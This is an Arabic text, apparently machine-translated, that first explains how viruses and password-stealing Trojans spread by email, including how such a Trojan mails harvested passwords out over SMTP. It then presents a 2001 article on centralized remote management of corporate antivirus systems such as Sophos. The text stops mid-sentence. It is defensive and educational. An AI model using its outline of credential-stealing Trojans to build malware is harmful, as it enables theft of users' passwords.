إذا كانت القناة الرئيسية لانتشار الفيروسات في فجر التطور التكنولوجي هي تبادل ملفات البرامج عبر الأقراص المرنة ، فإن راحة اليد اليوم تنتمي إلى البريد الإلكتروني. البريد الإلكتروني هو وسيلة ملائمة ولا غنى عنها للاتصالات التجارية. ومع ذلك ، يتم توزيع معظم الفيروسات والبريد العشوائي عبر البريد الإلكتروني ، ويمكن أن يكون قناة لتسريب البيانات السرية. في كل يوم ، يتم إرسال ملايين وملايين الرسائل عبر قنواتها ، والعديد من هذه الرسائل مصابة بالفيروسات.

لسوء الحظ ، يمكن أن تكون ملفات المرفقات المرسلة مع رسائل البريد الإلكتروني ضارة للغاية بصحة جهاز الكمبيوتر الخاص بك. ما هي خطورة الملفات المرفقة؟ على هذا النحو ، يمكن للمستخدم إرسال فيروس أو برنامج حصان طروادة أو مستند بتنسيق Microsoft Office (* .doc ، * .xls) مصابًا بفيروس كمبيوتر. من خلال تشغيل البرنامج المستلم للتنفيذ أو فتح مستند للعرض ، يمكن للمستخدم بدء فيروس أو تثبيت برنامج حصان طروادة على جهاز الكمبيوتر الخاص به. علاوة على ذلك ، بسبب الإعدادات غير الصحيحة لبرنامج البريد أو وجود أخطاء فيه ، فقد تفتح ملفات المرفقات تلقائيًا عند عرض محتويات الرسائل المستلمة. في هذه الحالة ، إذا لم تتخذ أي إجراءات وقائية ، فإن اختراق الفيروسات أو البرامج الضارة الأخرى في جهاز الكمبيوتر الخاص بك هو مسألة وقت ، وهناك محاولات أخرى لاختراق جهاز الكمبيوتر الخاص بك من خلال البريد الإلكتروني. على سبيل المثال ، قد يرسلون رسالة في شكل مستند HTML يحتوي على عنصر تحكم Trojan ActiveX مضمن فيه. من خلال فتح مثل هذه الرسالة ، يمكنك تنزيل هذا العنصر على جهاز الكمبيوتر الخاص بك ، وبعد ذلك سيبدأ على الفور في أداء وظيفته. البريد الإلكتروني - أحصنة طروادة التي تسمح لك "بسحب" كلمات المرور والمعلومات الأخرى من الملفات الموجودة على جهاز الكمبيوتر الخاص بك و إرسالها بالبريد الإلكتروني إلى المالك. يمكن أن تكون عمليات تسجيل دخول الموفر وكلمات مرور الإنترنت وكلمة مرور صندوق البريد وكلمات مرور ICQ و IRC وما إلى ذلك. لإرسال بريد إلكتروني إلى المالك ، يتصل حصان طروادة بخادم بريد الموقع عبر بروتوكول SMTP (على سبيل المثال ، smtp.mail.ru). بعد جمع البيانات الضرورية ، سيتحقق حصان طروادة من إرسال البيانات. إذا لم يتم ذلك ، يتم إرسال البيانات وتخزينها في السجل. إذا تم إرسالها بالفعل ، فسيتم استرداد الحرف السابق من السجل ، ومقارنته بالحرف الحالي. في حالة حدوث أي تغييرات في المعلومات (ظهرت بيانات جديدة) ، يتم إرسال الخطاب ، ويتم تسجيل بيانات كلمة المرور الجديدة في السجل. باختصار ، هذا النوع من طروادة هو ببساطة يجمع المعلومات ، وقد لا يدرك الضحية أن شخصًا ما يعرف بالفعل كلمات المرور الخاصة به. عادةً ما يحتوي أرشيف مثل حصان طروادة على 4 ملفات: محرر الخادم (المكوّن) ، خادم طروادة ، الحزم (المصمغ) ) الملفات وتعليمات الاستخدام.نتيجة العمل ، يمكن تحديد البيانات التالية: 1) عنوان IP لجهاز كمبيوتر الضحية ؛ 2) المعلومات الأكثر تفصيلاً حول النظام (الكمبيوتر واسم المستخدم ، إصدار Windows ، المودم ، وما إلى ذلك) ؛ 3) جميع كلمات المرور المخزنة مؤقتًا ؛ 4) جميع إعدادات اتصال الهاتف بما في ذلك أرقام الهواتف وتسجيلات الدخول وكلمات المرور ؛ 5) كلمات مرور ICQ ؛ 6) عدد المواقع التي تمت زيارتها مؤخرًا. بالإضافة إلى الإجراءات الإدارية البحتة ، يجب استخدام برامج خاصة لمكافحة الفيروسات (مكافحة الفيروسات) لمكافحة الفيروسات والبرامج الضارة الأخرى. ويمكن تثبيت برامج مكافحة الفيروسات على أجهزة الكمبيوتر الخاصة بالمرسل والمستقبل للحماية من الفيروسات التي تنتشر عن طريق البريد الإلكتروني. بريد. ومع ذلك ، فإن هذه الحماية غالبًا ما تكون غير كافية. تم تصميم برامج مكافحة الفيروسات التقليدية المثبتة على أجهزة الكمبيوتر الخاصة بمستخدمي الإنترنت لفحص الملفات وليست قادرة دائمًا على تحليل تدفق بيانات البريد الإلكتروني. إذا لم يقم برنامج مكافحة الفيروسات بفحص جميع الملفات المفتوحة تلقائيًا ، فيمكن للفيروس أو حصان طروادة التسلل بسهولة من خلال الحماية إلى قرص الكمبيوتر. بالإضافة إلى ذلك ، تعتمد فعالية برامج مكافحة الفيروسات إلى حد كبير على الامتثال لقواعد استخدامها: فهي ضرورية لتحديث قاعدة بيانات مكافحة الفيروسات بشكل دوري ، استخدم إعدادات مكافحة الفيروسات الصحيحة وما إلى ذلك. لسوء الحظ ، لا يعرف الكثير من مالكي أجهزة الكمبيوتر كيفية استخدام برامج مكافحة الفيروسات بشكل صحيح أو لا يقومون بتحديث قاعدة بيانات مكافحة الفيروسات ، مما يؤدي حتمًا إلى الإصابة بالفيروسات. وفهم أهمية مشكلة انتشار الفيروسات عن طريق البريد الإلكتروني ، تقدم العديد من الشركات برامج مكافحة خاصة برامج الفيروسات لحماية خوادم البريد. تقوم برامج مكافحة الفيروسات هذه بتحليل تدفق البيانات الذي يمر عبر خادم البريد ، مما يمنع نقل الرسائل مع ملفات المرفقات المصابة. هناك حل آخر - الاتصال بخوادم البريد باستخدام برامج مكافحة الفيروسات التقليدية المصممة لفحص الملفات.تعتبر الحماية من الفيروسات لخوادم بريد SMTP و POP3 أكثر فاعلية من الحماية من الفيروسات لأجهزة كمبيوتر المستخدم. كقاعدة عامة ، يكون المسؤول المتمرس مسؤولاً عن إعداد برامج مكافحة الفيروسات على الخادم ، والذي لن يخطئ عند الإعداد ، علاوة على ذلك ، سيمكن وضع التحديث التلقائي لقاعدة البيانات عبر الإنترنت. لا يضطر مستخدمو خوادم SMTP و POP3 الآمنة إلى القلق بشأن القناة الرئيسية لنشر الفيروسات - سوف يتلقون الرسائل التي تم تنظيفها بالفعل من الفيروسات. تعتمد الإجراءات التي تقوم بها خوادم البريد عند إرسال واستقبال الرسائل المصابة على إعدادات مضاد الفيروسات وخادم البريد نفسه. على سبيل المثال ، عندما يحاول المرسل إرسال رسالة تحتوي على ملف مصاب ، سيرفض خادم بريد SMTP الآمن القيام بذلك ، وسيعرض برنامج البريد رسالة تحذير. بدلاً من ذلك ، ستتلقى رسالة فقط حول اكتشاف الفيروس. على الرغم من الشعبية المتزايدة لمنصة Microsoft Windows ، فإن معظم خوادم الإنترنت تشغل اليوم Linux و FreeBSD وأنظمة تشغيل شبيهة بـ UNIX. الميزة الرئيسية لنظام Linux هي تكلفة الشراء المنخفضة جدًا. يمكن لأي شخص تنزيل توزيع Linux عبر الإنترنت وتثبيته على أي عدد من أجهزة الكمبيوتر. يحتوي هذا التوزيع على كل ما تحتاجه لإنشاء عقدة إنترنت ، بما في ذلك خوادم البريد الإلكتروني ، والتحكم عن بعد باستخدام وحدة تحكم نصية ، وما إلى ذلك. بالنسبة لنظام التشغيل من هذه السلسلة ، تم إنشاء بضع عشرات فقط من الفيروسات ، مما يشير إلى أمانها العالي.

4 كاسبيرسكي المضاد للفيروسات

(ج) الكسندر فرولوف ، 2001
[بريد إلكتروني محمي]، http://www.frolov.pp.ru ، http://www.datarecovery.ru

الغرض من المقال هو وصف أحدث وسائل الإدارة والتحكم عن بعد في أنظمة مكافحة الفيروسات المصممة للاستخدام في الشركات المتوسطة والكبيرة التي لديها عشرات ومئات من الخوادم ، فضلاً عن مئات وآلاف من محطات العمل. تم التحقيق في أدوات الإدارة والتحكم عن بعد الخاصة بـ Sophos و Norton AntiVirus و Mcafee NetShield و Trend Virus Control System وبرامج مكافحة الفيروسات الأخرى.

1. الحاجة إلى الإدارة والتحكم عن بعد

تعد الإدارة المركزية عن بُعد والتحكم في برامج مكافحة الفيروسات للشركات المتوسطة والكبيرة أمرًا ضروريًا للامتثال لتقنية الحماية من الفيروسات في جميع أنحاء شبكة الشركة.

إن إجراء عمليات في الوضع "اليدوي" مثل مراقبة تحديثات قاعدة بيانات مكافحة الفيروسات وتحميل وحدات برامج مكافحة الفيروسات ، ومراقبة فعالية اكتشاف الفيروسات على محطات العمل والخوادم ، وما إلى ذلك ، يكون غير فعال إذا كانت الشبكة بها عدد كبير من المستخدمين أو إذا كانت الشبكة تتكون من قطاعات منفصلة جغرافيًا.

إذا لم تضمن التنفيذ الفعال في الوقت المناسب للعمليات المذكورة أعلاه ، فمن المؤكد أنه سيتم انتهاك تقنية الحماية من الفيروسات لشبكة الشركة ، مما سيؤدي عاجلاً أم آجلاً إلى الإصابة بالفيروس. على سبيل المثال ، قد يقوم المستخدمون بتكوين التحديث التلقائي لقاعدة بيانات مكافحة الفيروسات بشكل غير صحيح أو يقومون ببساطة بإيقاف تشغيل أجهزة الكمبيوتر الخاصة بهم أثناء إجراء هذا التحديث. نتيجة لذلك ، لن يتم إجراء التحديثات التلقائية وسيكون هناك تهديد محتمل للإصابة بفيروسات جديدة.

نظرًا لأن خدمات مسؤول النظام المؤهل باهظة الثمن ، فحتى الشركات الكبيرة ليس لديها سوى عدد قليل من هؤلاء الموظفين في موظفيها. بدون أنظمة مركزية خاصة لإدارة ومراقبة تشغيل برامج مكافحة الفيروسات ، لن يتمكنوا فعليًا من ضمان الامتثال لتقنية الحماية من الفيروسات على مئات وآلاف من أجهزة الكمبيوتر في شبكة الشركة.

في الوقت نفسه ، يمكن لأنظمة التحكم عن بعد والإدارة تحديث قواعد بيانات مكافحة الفيروسات وتمهيد برامج مكافحة الفيروسات على أكثر من 1000 جهاز كمبيوتر في 10 دقائق (يتم توفير بيانات Sophos anti-virus هنا).

سبب آخر لوجود حاجة لأنظمة للإدارة عن بعد والتحكم في برامج مكافحة الفيروسات هو المستخدمين "الكسالى".

كقاعدة عامة ، المستخدمون مشغولون تمامًا بعملهم وليس لديهم الرغبة ولا الفرصة لتشتيت انتباههم عن عمل النظام. على وجه الخصوص ، يعتبر تثبيت برامج مكافحة الفيروسات وتكوينها أو إجراء عمليات الفحص أو تحديث قواعد بيانات مكافحة الفيروسات من قبل المستخدمين مسؤولية مسؤولي النظام أو الخدمات الفنية الأخرى. اعتقادًا بأن مسؤول النظام يقوم بعمله ، غالبًا ما يتجاهل المستخدمون تمامًا متطلبات تعليمات الحماية من الفيروسات أو لا يقرأونها على الإطلاق.

في ظل هذه الظروف ، يجب أن تكون أنظمة الحماية من الفيروسات صديقة للمستخدمين ، وتؤدي جميع العمليات الضرورية تلقائيًا وبشكل غير محسوس للمستخدم. لا ينطبق هذا فقط على فحص الملفات ، ولكن أيضًا على وظائف مثل تثبيت برامج مكافحة الفيروسات وتكوينها وتحديثها.

في الوقت نفسه ، يجب على مسؤول النظام تثبيت برنامج مكافحة الفيروسات وتحديثه عن بُعد ، وكذلك مراقبة حالة الحماية من الفيروسات على أي محطات عمل وخوادم شبكة ، باستخدام محطة العمل الخاصة به لهذا الغرض. هذا المبدأ يكمن وراء جميع أنظمة الحماية الحديثة المضادة للفيروسات للشركات.

2. وظائف الإدارة والتحكم عن بعد

في هذا القسم ، سوف نستعرض وظائف الإدارة والتحكم عن بعد المطبقة في أنظمة مكافحة الفيروسات الحديثة. فيما يلي قائمة بهذه الوظائف:

• التثبيت والتحديث عن بعد لبرامج مكافحة الفيروسات ؛
• التحديث عن بعد لقواعد بيانات مكافحة الفيروسات ؛
• إنشاء ونسخ مجموعات التوزيع إلى خوادم الشبكة للتثبيت المركزي لمضادات الفيروسات ؛
• التكوين عن بعد لبرامج مكافحة الفيروسات المثبتة على محطات العمل والخوادم ؛
• الكشف التلقائي عن محطات العمل الجديدة المتصلة بشبكة الشركة ، يليها التثبيت التلقائي لبرامج مكافحة الفيروسات على هذه المحطات ؛
• جدولة المهام للتشغيل الفوري أو المتأخر (مثل تحديث البرامج ، وقاعدة بيانات مكافحة الفيروسات ، ومسح الملفات ، وما إلى ذلك) على أي أجهزة كمبيوتر متصلة بالشبكة ؛
• عرض في الوقت الحقيقي لعملية تشغيل مكافحة الفيروسات على محطات العمل وخوادم الشبكة

دعنا نتحدث عن هذا بمزيد من التفصيل.

التثبيت والتحديث عن بعد لبرامج مكافحة الفيروسات

عادةً ما يتكون التثبيت اليدوي لبرنامج مكافحة الفيروسات من تشغيل المثبت ويتم توجيهه بواسطة معالج التثبيت التفاعلي. في هذه الحالة ، في مربعات حوار المعالج ، يجب عليك تحديد القرص المحلي والدليل حيث سيتم تثبيت البرنامج ، وكذلك تعيين معلمات وأنماط تشغيل البرنامج.

قضايا المستخدم

على الرغم من أن هذه العملية بسيطة لمحطات العمل ، إلا أنه يتم إجراؤها في شبكات الشركات عادةً بواسطة مسؤول النظام أو فريق فني. نظرًا لأن معظم المستخدمين لديهم فكرة غامضة عن تقنيات الحماية من الفيروسات أو ليس لديهم أي فكرة على الإطلاق (وليس عليهم ذلك!) ، فإن مسؤولي النظام لا يثقون بهم لأداء هذه العملية. بالنسبة لتثبيت مضادات الفيروسات على الخادم ، يتم ذلك فقط من قبل مسؤول النظام.

عدم وجود المستوى المطلوب للوصول إلى موارد النظام

إذا كانت محطة عمل المستخدم تحتوي على أنظمة تشغيل Microsoft Windows NT / 2000 مثبتة ، فعند تعيين سياسة الوصول بشكل مناسب ، يحظر مسؤول النظام الجيد المستخدمين بشكل عام من تثبيت أي برامج بأنفسهم. علاوة على ذلك ، فإنه يحظر الاتصال بالمجال المحلي بحقوق مسؤول النظام. في هذه الحالة ، لا يمتلك المستخدم القدرة المادية لتثبيت وتكوين برنامج مكافحة الفيروسات من تلقاء نفسه.

مشاكل في الفروع البعيدة للشركة

تظهر مشكلة أخرى تتعلق بالتثبيت اليدوي لبرامج مكافحة الفيروسات في الفروع البعيدة للشركات التي غالبًا ما لا يكون لديها مسؤول نظام على موظفيها. يأتي المسؤول إلى هذه الفروع من حين لآخر ، عند الحاجة. في الوقت نفسه ، لا يتمتع الموظفون العاملون في فرع بعيد عادةً بإمكانية الوصول إلى الموارد اللازمة لتثبيت برامج مكافحة الفيروسات على الخادم ومحطات العمل الخاصة بالشبكة المحلية للفرع.

الكثير من الوقت للاستثمار

حتى إذا تمكن المسؤول أو الموظف الفني من تجاوز جميع محطات العمل على شبكة الشركة لتثبيت برامج مكافحة الفيروسات يدويًا ، فقد يستغرق الأمر وقتًا طويلاً - ففي النهاية يمكن توصيل مئات وآلاف أجهزة الكمبيوتر بشبكة الشركة. بالإضافة إلى ذلك ، يتم إصلاح أجهزة الكمبيوتر واستبدال البرامج المثبتة عليها وإجراء عمليات أخرى تتطلب إعادة تثبيت برامج مكافحة الفيروسات.

التثبيت التلقائي عن بعد لمضادات الفيروسات Sophos

وبالتالي ، يجب أن يسمح نظام مكافحة الفيروسات الذي يدعي أنه يُستخدم في قطاع الشركات في السوق بالتثبيت عن بُعد على جميع أجهزة الكمبيوتر الموجودة على شبكة الشركة من محطة عمل مسؤول نظام واحد.

على سبيل المثال ، باستخدام الأداة المساعدة SAVAdmin لنظام مكافحة الفيروسات Sophos ، يمكن للمسؤول إنشاء أدلة التوزيع لأدلة التثبيت المركزية (CID) عن طريق وضعها على بعض الخوادم في شبكة الشركة. على سبيل المثال ، يمكنك إنشاء مثل هذا الدليل في المكتب المركزي ودليل واحد لكل قسم بعيد في الشركة.

يمكن للمسؤول إعداد النسخ المتماثل بين أدلة CID المختلفة ، والتي سيتم تنفيذها تلقائيًا. في هذه الحالة ، لن يضطر إلى تحديث جميع أدلة CID من تلقاء نفسه - يمكنك استبدال ملفات التوزيع لنظام مكافحة الفيروسات فقط في الدليل الرئيسي. سيتم تحديث محتويات الدلائل الأخرى (على سبيل المثال ، الموجودة في الفروع البعيدة) تلقائيًا ، ومعها ، سيتم أيضًا تحديث برامج مكافحة الفيروسات في جميع محطات العمل الخاصة بشبكات الفروع المحلية المقابلة.

بعد ذلك ، يبدأ المسؤول من وحدة التحكم SAVAdmin التثبيت عن بُعد لمكافحة الفيروسات من كتالوجات CID على محطات العمل أو مجموعات محطات العمل أو المجالات المحددة. عندما يتغير محتوى CID ، يتم تحديث جميع برامج مكافحة الفيروسات في الشبكة تلقائيًا. يمكن للمسؤول التحكم في عملية تحديث إصدارات برامج مكافحة الفيروسات.

طورت Sophos تقنية "الحد الأدنى من الدفع والسحب الكامل" لتسريع عملية تثبيت برامج مكافحة الفيروسات وتحديثها. تتضمن هذه التقنية تثبيتًا متوازيًا وتحديثًا لإصدارات مكافحة الفيروسات. في نفس الوقت ، يتم تحديث شبكة تتكون من أكثر من 1000 جهاز كمبيوتر في 10 دقائق.

دعنا نلقي نظرة فاحصة على إجراء التثبيت المركزي.

قم بإنشاء دليل رئيسي للتثبيت المركزي

في المرحلة الأولى ، يشكل المسؤول الدليل الرئيسي للتثبيت المركزي من محطة العمل الخاصة به. يوجد هذا الدليل عادةً على أحد خوادم الشبكة المحلية للمكاتب المركزية للشركة (الشكل 1-1).

يتم إنشاء دليل التثبيت المركزي الرئيسي وتشكيل محتوياته تلقائيًا بواسطة برنامج التثبيت الأولي الذي يطلقه المسؤول من محطة العمل الخاصة به.

أرز. 1-1. نسخ الملفات إلى دليل التثبيت المركزي الرئيسي

النسخ المتماثل للدليل الرئيسي للتثبيت المركزي

إذا كانت شبكة الشركة توحد فروعًا بعيدة جغرافيًا متصلة بقنوات اتصال بطيئة نسبيًا ، لتسريع تثبيت مضادات الفيروسات على الخوادم ومحطات عمل الفروع بشكل كبير ، يمكن للمسؤول إنشاء أدلة تثبيت مركزية على خوادم الفروع (الشكل 1). 2).

يتم إنشاء هذه الدلائل وملؤها تحت سيطرة برنامج الإعداد الأولي الذي يعمل على محطة عمل المسؤول. في هذه الحالة ، يمكن للمسؤول تحديد إعدادات النسخ المتماثل التلقائي لمحتويات دليل التثبيت المركزي الرئيسي وأدلة التثبيت المركزية الأخرى. عند تحديث محتويات الدليل الرئيسي ، سيتم تحديث محتويات الأدلة الأخرى في التثبيت المركزي تلقائيًا وفقًا للجدول المحدد من قبل المسؤول.

أرز. 1-2. نسخ ملفات الدليل الرئيسي للتثبيت المركزي إلى أدلة التثبيت المركزية الأخرى

تثبيت برامج مكافحة الفيروسات على جميع محطات العمل والخوادم

بعد تكوين جميع أدلة التثبيت المركزي ، تبدأ عملية تثبيت مضادات الفيروسات على محطات العمل وخوادم الشبكة. يتم إجراء التثبيت في وقت واحد على جميع أجهزة الكمبيوتر ، وتستخدم كل شبكة محلية دليل التثبيت المركزي الخاص بها (الشكل 1-3).

يتم تعيين جدول التثبيت من قبل المسؤول. نظرًا لأن التثبيت يتم في كل فرع من دليله الخاص ، فإن هذه العملية لا تفرط في تحميل قنوات الاتصال التي تربط الشبكات المحلية للفروع.

التحديث عن بعد لقواعد بيانات مكافحة الفيروسات

لا أحد يشك في أهمية التحديث في الوقت المناسب لقواعد بيانات مكافحة الفيروسات للكشف عن فيروسات جديدة ، ومع ذلك ، في الشركات المتوسطة والكبيرة ، يحتوي هذا الإجراء على عدد من الميزات.

تصميم جدول التحديث

بادئ ذي بدء ، هناك صعوبات في وضع جدول زمني للتحديث التلقائي لقاعدة بيانات مكافحة الفيروسات.

كما تعلم ، توفر معظم برامج مكافحة الفيروسات التحديث التلقائي لقواعد بيانات مكافحة الفيروسات وفقًا لجدول زمني ، على سبيل المثال ، في ساعات وأيام محددة من الأسبوع. ومع ذلك ، لكي يكتمل التحديث بنجاح ، يجب تشغيل الكمبيوتر وتوصيله بشبكة الإنترانت المحلية للشركة أو بالإنترنت عند بدء الإجراء.

يقوم مسؤولو النظام أحيانًا بإعداد جدول تحديث بحيث يبدأ تنزيل قاعدة بيانات جديدة لمكافحة الفيروسات في وقت الغداء. ولكن إذا تم استخدام الكمبيوتر للعمل بنظام الورديات ، فلن يكون اختيار وقت التحديث أمرًا سهلاً دائمًا.

أرز. 1-3. التثبيت المتزامن على جميع محطات العمل وخوادم شبكة الشركة من أدلة التثبيت المركزية

مشاكل في جدولة المستخدم

ويرجع ذلك ، من ناحية ، إلى عدم كفاية مؤهلات المستخدمين وعدم الرغبة في أداء أي عمل في النظام لا يرتبط مباشرة بواجبات الإنتاج ، ومن ناحية أخرى ، إلى عدم الوصول إلى موارد النظام اللازمة للتكوين. كما قلنا أعلاه ، غالبًا ما يقوم المسؤولون بإعداد سياسات النظام بطريقة لا يتمكن فيها المستخدم العادي من تثبيت برامج النظام أو تغيير إعداداته من تلقاء نفسه.

تحديث مركزي لقواعد بيانات مكافحة الفيروسات

تسمح أنظمة مكافحة الفيروسات الحديثة بإدارة مركزية تلقائية لعملية تحديث قواعد بيانات مكافحة الفيروسات ، كما توفر للمسؤول جميع الأدوات اللازمة للتحكم عن بعد في التحديثات.

لا تسمح وحدة التحكم الإدارية الخاصة بالمسؤول بالتحكم في التحديث فحسب ، بل تتيح أيضًا ، إذا لزم الأمر ، تشغيل تحديث إجباري لأي محطة عمل أو مجموعة مستخدمين أو مجال.

يتم إجراء التحديث بنفس طريقة التثبيت الأولي.

أولاً ، يكتب المسؤول ملفات التحديث إلى الدليل الرئيسي للتثبيت المركزي (الشكل 1-1). يتم نسخ محتويات هذا الدليل بعد ذلك إلى أدلة التثبيت المركزية الأخرى (الشكل 1-2). وأخيرًا ، في المرحلة الأخيرة ، يتم تحديث قواعد بيانات مكافحة الفيروسات للخوادم ومحطات العمل من الدلائل المقابلة للتثبيت المركزي (الشكل 1-3).

إذا كانت شبكة الشركة متصلة بالإنترنت ، فيمكن تحديث محتويات دليل التثبيت المركزي الرئيسي تلقائيًا من خادم شركة مكافحة الفيروسات. يمكن تعيين الجدول الزمني لهذا التحديث من قبل مسؤول شبكة الشركة.

تكوين مكافحة الفيروسات بعد التثبيت

بعد اكتمال التثبيت ، يمكن تحديد بعض التكوين القياسي لمكافحة الفيروسات ، على سبيل المثال ، توفير فحص مضاد للفيروسات للملفات عند أي وصول إليها ، وكذلك إنشاء تقرير بنتائج الفحص.

إذا لزم الأمر ، تتيح لك أدوات الإدارة والتحكم عن بُعد تعيين تكوين مختلف لمكافحة الفيروسات محدد باستخدام آلية النموذج. يمكن للمسؤول إعداد العديد من هذه القوالب التي تحدد أوضاع تشغيل مكافحة الفيروسات لمحطات عمل مختلفة أو مجموعات مستخدمين أو مجالات.

التكوين عن بعد لبرامج مكافحة الفيروسات

من المعروف أن فعالية استخدامه تعتمد على مدى صحة تنفيذ إعدادات برنامج مكافحة الفيروسات. على سبيل المثال ، عند رفض فحص جميع الملفات التي لا تحتوي على امتداد .com أو .exe لتسريع العمل ، فإن المستخدم يخاطر بإصابة جهاز الكمبيوتر الخاص به بفيروسات macrocommand التي تنتشر عبر ملفات مستندات Office.

كقاعدة عامة ، لا يثق المسؤولون ذوو التفكير المتقدم في المستخدمين لتكوين إعدادات برنامج مكافحة الفيروسات ، لا سيما تلك المتعلقة بأوضاع فحص الملفات. ومع ذلك ، يجب عليهم القيام بهذا العمل بأنفسهم.

لاحظ أنه في شبكات الإنترانت الكبيرة الخاصة بالشركات ، يتعين عليك أحيانًا استخدام إعدادات مختلفة لمستخدمين أو مجموعات مستخدمين أو مجالات مختلفة. كل هذا يعقد التكوين اليدوي لإعدادات مكافحة الفيروسات.

تسمح أنظمة مكافحة الفيروسات الحديثة بالتكوين المركزي عن بُعد لجميع معلمات برامج مكافحة الفيروسات (أوضاع تشغيل الماسح ، والجدول الزمني لتحديث قاعدة بيانات مكافحة الفيروسات ، والإجراءات الواجب اتخاذها بشأن الملفات المصابة ، وما إلى ذلك). يمكن إجراء هذه العملية بواسطة مسؤول النظام من محطة العمل الخاصة به ، ويمكن للمسؤول تطبيق مخططات إعدادات مختلفة لمستخدمين ومجموعات مستخدمين ومجالات مختلفة.

اكتشاف محطات عمل جديدة

تعيش شبكة الإنترانت الخاصة بشركة كبيرة حياتها الخاصة. من وقت لآخر ، تحدث أحداث مثل توصيل محطات عمل جديدة أو إصلاح أو استبدال محطات العمل القديمة وما إلى ذلك.

في الوقت نفسه ، تتطلب جميع التغييرات في تكوين محطات العمل في الشبكة تحديثًا في الوقت المناسب لتكوينات أدوات مكافحة الفيروسات. ومع ذلك ، لا يمكن لمسؤول نظام واحد تتبع جميع التغييرات في شبكة من مئات وآلاف أجهزة الكمبيوتر. لذلك ، يتم استكمال أنظمة مكافحة الفيروسات الحديثة بأدوات التحليل الآلي لتكوين الشبكة لظهور محطات جديدة فيها أو استبدال المحطات القديمة.

عند اكتشاف تغييرات في تكوين الشبكة ، يقوم نظام الإدارة والتحكم تلقائيًا بتثبيت برامج مكافحة الفيروسات أو ، إذا لزم الأمر ، يقوم تلقائيًا بتحديث وحدات برامج مكافحة الفيروسات ، بالإضافة إلى قاعدة بيانات مكافحة الفيروسات. نتيجة لذلك ، بعد تثبيت محطة العمل ، بعد إصلاحها أو استبدالها ، سيتم تثبيت برنامج مكافحة الفيروسات تلقائيًا على قرصها دون أي تدخل من المسؤول أو المستخدم.

جدولة الوظائف

يتيح لك نظام الإدارة والتحكم المركزي عن بُعد جدولة المهام لأجهزة الكمبيوتر الفردية على شبكة الشركة ، ولمجموعات محددة من المستخدمين أو المجالات ، فضلاً عن التحكم في تقدم ونتائج المهام قيد التشغيل.

تحديد الجدول

يتيح لك التخطيط تحديد وتيرة تنفيذ الإجراءات المختلفة وفقًا لجداول زمنية مختلفة:

• ساعيا؛
• يوميًا؛
• أسبوعي؛
• في أيام معينة من الأسبوع أو الأشهر ؛
• الساعة التالية ، يوم الأسبوع أو الشهر ؛
• إعدام واحد في وقت معين ؛
• تنفيذ فوري واحد للإجراء

قائمة الإجراءات المخطط لها

فيما يلي قائمة بالإجراءات التي يمكن جدولتها في أنظمة مكافحة الفيروسات الحديثة:

• إنشاء تقرير مفصل عن تكوين الأجهزة والبرامج الخاصة بمحطة العمل ؛
• تحديد رقم إصدار برنامج مكافحة الفيروسات ، وكذلك تاريخ الإنشاء ورقم إصدار قاعدة بيانات مكافحة الفيروسات ؛
• تثبيت برنامج مضاد للفيروسات على الكمبيوتر المحدد ، على أجهزة كمبيوتر لمجموعة مستخدمين أو مجال ؛
• تحديث محتويات دليل التوزيع للتثبيت المركزي لبرامج مكافحة الفيروسات ؛
• تغيير المسار إلى دليل توزيع التثبيت المركزي لبرامج مكافحة الفيروسات ؛
• تغيير الحساب (المعرف / كلمة المرور) المستخدم لتحديث برنامج مكافحة الفيروسات وقاعدة بيانات مكافحة الفيروسات ؛
• الكشف عن التغييرات في تكوين الشبكة (البحث عن محطات عمل جديدة أو محدثة) من أجل تثبيت برامج مكافحة الفيروسات تلقائيًا على أجهزة الكمبيوتر الجديدة ؛
• نسخ دليل التوزيع الرئيسي للتثبيت المركزي لبرامج مكافحة الفيروسات إلى أدلة أخرى (على سبيل المثال ، الموجودة على الخوادم المثبتة في فروع الشركة). يستخدم هذا الإجراء لتوزيع مجموعة أدوات توزيع جديدة أو محدثة على عدة خوادم مخصصة للتثبيت المركزي لبرامج مكافحة الفيروسات.

يتيح لك نظام التحكم تحديد تنفيذ الأوامر التعسفية لنظام التشغيل قبل بدء المهمة ، وكذلك بعد تنفيذها.

يمكنك أيضًا تحديد الإجراءات التي يجب اتخاذها عند تعطل الوظيفة. على سبيل المثال ، يمكنك تكرار تثبيت برنامج مكافحة الفيروسات إذا لم يتم إكماله بنجاح لسبب ما.

بدء العمل وإيقافه

في أي وقت ، يمكن للمسؤول بدء أو إيقاف الإجراء المحدد باستخدام وحدة تحكم الإدارة.

تحرير مهمة

يمكن تحرير وظيفة معدة ولكن لم تبدأ بعد. في الوقت نفسه ، يمكن للمسؤول تغيير جدول المهمة قيد التشغيل ونوع المهمة والسمات الأخرى للمهمة.

حذف وظيفة

إذا كانت المهمة في قائمة الانتظار للتنفيذ أو التشغيل ، يمكن للمسؤول حذفها. ثم يتم إيقاف تشغيل الوظيفة.

مراقبة تنفيذ المهام

عادةً ما يتم إعطاء مهمة مجدولة اسمًا ونوعًا. يحدد النوع الإجراء الذي سيتم تنفيذه ، ويستخدم الاسم من قبل المسؤول لتتبع نتيجة الوظيفة. يمكن إجراء هذه المراقبة بشكل مستمر في الوقت الحقيقي.

تتيح لك أدوات الفرز المتقدمة تتبع مجموعات المهام الضرورية فقط ، على سبيل المثال:

• مهام من نوع معين ؛
• الوظائف التي تعمل على محطات العمل المختارة ؛
• وظائف تعمل على محطات عمل لمجموعة مستخدمين ؛
• وظائف تعمل على محطات العمل في المجال المحدد

يتم تسجيل نتائج تنفيذ المهام.

خيارات الوظيفة

باستخدام وحدة التحكم والإدارة عن بُعد ، يمكن للمسؤول تعيين معلمات متنوعة للمهام المجدولة.

المعلمات المشتركة

لقد قمنا بإدراج خيارات الوظيفة العامة أدناه:

• اسم العمل؛
• اسم الملف لتسجيل نتائج المهمة ؛
• أوامر يتم تنفيذها قبل وبعد الانتهاء من المهمة ؛
• علم استمرار العمل. تتم استعادة الوظائف الدائمة ، على عكس الوظائف المؤقتة ، عند إعادة تشغيل وحدة التحكم الإدارية ؛
• مربع اختيار لتنفيذ المهمة لجميع أجهزة الكمبيوتر للمجموعة المحددة ؛
• مربع الاختيار لإعادة محاولة المهمة تلقائيًا إذا فشلت

المعلمات الهدف

تحدد هذه الإعدادات محطات العمل ومجموعات المستخدمين والمجالات التي يتم تشغيل الوظيفة من أجلها. في الواقع ، هذه مجرد قائمة بأجهزة الكمبيوتر أو مجموعات المستخدمين أو المجالات التي أنشأها المسؤول.

خيارات التثبيت الإضافية

تتضمن هذه المجموعة الإعدادات التي تؤثر على إعدادات تثبيت برامج مكافحة الفيروسات المرتبطة بفحص الشبكة بحثًا عن نُسخ مكافحة الفيروسات المثبتة. يمكنك تحديد أن التثبيت يجب أن يتم فقط على محطات العمل التي:

